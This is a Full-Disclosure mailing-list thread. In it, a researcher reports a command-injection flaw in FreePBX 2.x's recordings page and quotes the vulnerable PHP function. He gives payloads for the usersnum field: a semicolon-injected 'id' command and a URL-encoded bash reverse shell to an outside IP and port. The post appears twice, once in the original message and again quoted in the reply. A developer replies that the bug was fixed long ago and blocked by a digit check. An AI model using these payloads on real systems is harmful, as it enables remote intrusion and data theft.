Mailing List Archive

Freepbx 2.x , Command Execution vuln
App : Freepbx 2.x
Download : schmoozecom.net
Auther : i-Hmx
Mail : n0p1337@gmail.com
Home : security arrays inc. , sec4ever.com , exploit4arab.net

And again , while the distro is widely user , Schmoozecom staff not giving
it enough attention ,
all they provided for the distro is adding the schmoozecom fancy logo and
"Developed by schmoozecom" Teraraa :/
What ever,
Freepbx suffer from another command execution vuln , not so critical but
perhaps many people gonna be interested abt it
as it can be used to dump plaintext data from the PBX Box ;)

Vulnerable function "recording_addpage" @
admin/modules/recordings/page.recordings.php

function recording_addpage($usersnum) {
global $fc_save;
global $fc_check;
global $recordings_save_path;

?>
<div class="content">
<h2><?php echo _("System Recordings")?></h2>
<h3><?php echo _("Add Recording") ?></h3>
<h5><?php echo _("Step 1: Record or upload")?></h5>
<?php if (!empty($usersnum)) {
echo '<p>';
echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("
dial")."&nbsp;".$fc_save." <span>";
echo _("Start speaking at the tone. Press # when
finished.")."</span></a>";
echo _("and speak the message you wish to record. Press # when
finished.")."\n";
echo '</p>';
} else { ?>
<form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post">
<input type="hidden" name="display" value="recordings">
<?php
echo _("If you wish to make and verify recordings from your phone,
please enter your extension number here:"); ?>
<input type="text" size="6" name="usersnum" tabindex="<?php echo
++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo
_("Go"); ?>" tabindex="<?php echo ++$tabindex;?>">
</form>
<?php } ?>
<p></p>
<form enctype="multipart/form-data" name="upload" action="<?php echo
$_SERVER['PHP_SELF'] ?>" method="POST">
<?php echo _("Alternatively, upload a recording in any supported
asterisk format. Note that if you're using .wav, (eg, recorded with
Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at
8000Hz")?>:<br>
<input type="hidden" name="display" value="recordings">
<input type="hidden" name="action" value="recordings_start">
<input type="hidden" name="usersnum" value="<?php echo
$usersnum ?>">
<input type="file" name="ivrfile" tabindex="<?php echo
++$tabindex;?>"/>
<input type="button" value="<?php echo _("Upload")?>"
onclick="document.upload.submit(upload);alert('<?php echo
addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php
echo ++$tabindex;?>"/>
</form>
<?php
if (isset($_FILES['ivrfile']['tmp_name']) &&
is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
if (empty($usersnum) || !ctype_digit($usersnum)) {
$dest = "unnumbered-";
} else {
$dest = "{$usersnum}-";
}
$suffix =
preg_replace('/[^0-9a-zA-Z]/','',substr(strrchr($_FILES['ivrfile']['name'],
"."), 1));
$destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " .
$destfilename);
system("chmod g+rw ".$destfilename);
echo "<h6>"._("Successfully uploaded")."
".$_FILES['ivrfile']['name']."</h6>";
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
} ?>
<form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>"
method="post" onsubmit="return rec_onsubmit();">
<input type="hidden" name="action" value="recorded">
<input type="hidden" name="display" value="recordings">
<input type="hidden" name="usersnum" value="<?php echo $usersnum ?>">
<?php
if (!empty($usersnum)) { ?>
<h5><?php echo _("Step 2: Verify")?></h5>
<p> <?php echo _("After recording or
uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to
listen to your recording.")?> </p>
<p> <?php echo _("If you wish to re-record your message,
dial")."&nbsp;".$fc_save; ?></p>
<h5><?php echo _("Step 3: Name")?> </h5> <?php
} else {
echo "<h5>"._("Step 2: Name")."</h5>";
} ?>
<table style="text-align:right;">
<tr valign="top">
<td valign="top"><?php echo _("Name this Recording")?>: </td>
<td style="text-align:left"><input type="text" name="rname"
value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td>
</tr>
</table>

<h6><?php
echo _("Click \"SAVE\" when you are satisfied with your recording");
echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
<input name="Submit" type="submit" value="<?php echo _("Save")?>"
tabindex="<?php echo ++$tabindex;?>"></h6>
<?php recordings_form_jscript(); ?>
</form>
</div>
<?php
}

Actually as you can see there are many exploitable lines there , but here
am interested about this line
system("chmod g+rw ".$destfilename);
if you traced the function flow you will notice that 'destfilename' get
part of his value from the parameter $_REQUEST['usersnum']
the function is called via
Target/admin/config.php?type=setup&display=recordings
before uploading open firebug
search for usersnum
edit value to
fa;id>faris;fax
or , for backconnetion use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
and you are ready to dominate , or even make some $$ if you r interested ;)
Have a good day
Re: Freepbx 2.x , Command Execution vuln [ In reply to ]
Just a quick note. As I previously said, we have security@freepbx.org,
and we do care deeply about security issues in both FreePBX and
FreePBX Distro. If you're uncomfortable sending an email to there,
you can also send issues to my personal email address (which isn't
hard to find), with the word 'security' in the topic, which
automatically flags it as important.

I appreciate the report, however, it turns out that the issue here was
fixed in FreePBX 2.3, about 3 and a half years ago. Specifically, svn
http://www.freepbx.org/trac/changeset/10299, which was addressed in
FreePBX Ticket 4550 - http://issues.freepbx.org/browse/FREEPBX-4550

I did try manually duplicating it, and I couldn't find a away to avoid
the ctype_digit check, which blocked this specific attack.

I'm happy to take this off-list if you think I've mis-understood.

--Rob Thomas

On Mon, Feb 24, 2014 at 1:09 AM, 0u7 5m4r7 <n0p1337@gmail.com> wrote:
> App : Freepbx 2.x
> Download : schmoozecom.net
> Auther : i-Hmx
> Mail : n0p1337@gmail.com
> Home : security arrays inc. , sec4ever.com , exploit4arab.net
>
> And again , while the distro is widely user , Schmoozecom staff not giving
> it enough attention ,
> all they provided for the distro is adding the schmoozecom fancy logo and
> "Developed by schmoozecom" Teraraa :/
> What ever,
> Freepbx suffer from another command execution vuln , not so critical but
> perhaps many people gonna be interested abt it
> as it can be used to dump plaintext data from the PBX Box ;)
>
> Vulnerable function "recording_addpage" @
> admin/modules/recordings/page.recordings.php
>
> function recording_addpage($usersnum) {
> global $fc_save;
> global $fc_check;
> global $recordings_save_path;
>
> ?>
> <div class="content">
> <h2><?php echo _("System Recordings")?></h2>
> <h3><?php echo _("Add Recording") ?></h3>
> <h5><?php echo _("Step 1: Record or upload")?></h5>
> <?php if (!empty($usersnum)) {
> echo '<p>';
> echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("
> dial")."&nbsp;".$fc_save." <span>";
> echo _("Start speaking at the tone. Press # when
> finished.")."</span></a>";
> echo _("and speak the message you wish to record. Press # when
> finished.")."\n";
> echo '</p>';
> } else { ?>
> <form name="xtnprompt" action="<?php $_SERVER['PHP_SELF'] ?>"
> method="post">
> <input type="hidden" name="display" value="recordings">
> <?php
> echo _("If you wish to make and verify recordings from your phone,
> please enter your extension number here:"); ?>
> <input type="text" size="6" name="usersnum" tabindex="<?php echo
> ++$tabindex;?>"> <input name="Submit" type="submit" value="<?php echo
> _("Go"); ?>" tabindex="<?php echo ++$tabindex;?>">
> </form>
> <?php } ?>
> <p></p>
> <form enctype="multipart/form-data" name="upload" action="<?php echo
> $_SERVER['PHP_SELF'] ?>" method="POST">
> <?php echo _("Alternatively, upload a recording in any supported
> asterisk format. Note that if you're using .wav, (eg, recorded with
> Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, at
> 8000Hz")?>:<br>
> <input type="hidden" name="display" value="recordings">
> <input type="hidden" name="action" value="recordings_start">
> <input type="hidden" name="usersnum" value="<?php echo
> $usersnum ?>">
> <input type="file" name="ivrfile" tabindex="<?php echo
> ++$tabindex;?>"/>
> <input type="button" value="<?php echo _("Upload")?>"
> onclick="document.upload.submit(upload);alert('<?php echo
> addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php
> echo ++$tabindex;?>"/>
> </form>
> <?php
> if (isset($_FILES['ivrfile']['tmp_name']) &&
> is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
> if (empty($usersnum) || !ctype_digit($usersnum)) {
> $dest = "unnumbered-";
> } else {
> $dest = "{$usersnum}-";
> }
> $suffix =
> preg_replace('/[^0-9a-zA-Z]/','',substr(strrchr($_FILES['ivrfile']['name'],
> "."), 1));
> $destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
> move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
> system("chgrp " . $amp_conf['AMPASTERISKGROUP'] . " " .
> $destfilename);
> system("chmod g+rw ".$destfilename);
> echo "<h6>"._("Successfully uploaded")."
> ".$_FILES['ivrfile']['name']."</h6>";
> $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
> } ?>
> <form name="prompt" action="<?php $_SERVER['PHP_SELF'] ?>" method="post"
> onsubmit="return rec_onsubmit();">
> <input type="hidden" name="action" value="recorded">
> <input type="hidden" name="display" value="recordings">
> <input type="hidden" name="usersnum" value="<?php echo $usersnum ?>">
> <?php
> if (!empty($usersnum)) { ?>
> <h5><?php echo _("Step 2: Verify")?></h5>
> <p> <?php echo _("After recording or
> uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em> "._("to listen
> to your recording.")?> </p>
> <p> <?php echo _("If you wish to re-record your message,
> dial")."&nbsp;".$fc_save; ?></p>
> <h5><?php echo _("Step 3: Name")?> </h5> <?php
> } else {
> echo "<h5>"._("Step 2: Name")."</h5>";
> } ?>
> <table style="text-align:right;">
> <tr valign="top">
> <td valign="top"><?php echo _("Name this Recording")?>: </td>
> <td style="text-align:left"><input type="text" name="rname"
> value="<?php echo $rname; ?>" tabindex="<?php echo ++$tabindex;?>"></td>
> </tr>
> </table>
>
> <h6><?php
> echo _("Click \"SAVE\" when you are satisfied with your recording");
> echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n"; ?>
> <input name="Submit" type="submit" value="<?php echo _("Save")?>"
> tabindex="<?php echo ++$tabindex;?>"></h6>
> <?php recordings_form_jscript(); ?>
> </form>
> </div>
> <?php
> }
>
> Actually as you can see there are many exploitable lines there , but here am
> interested about this line
> system("chmod g+rw ".$destfilename);
> if you traced the function flow you will notice that 'destfilename' get part
> of his value from the parameter $_REQUEST['usersnum']
> the function is called via
> Target/admin/config.php?type=setup&display=recordings
> before uploading open firebug
> search for usersnum
> edit value to
> fa;id>faris;fax
> or , for backconnetion use
> fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
> and you are ready to dominate , or even make some $$ if you r interested ;)
> Have a good day
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/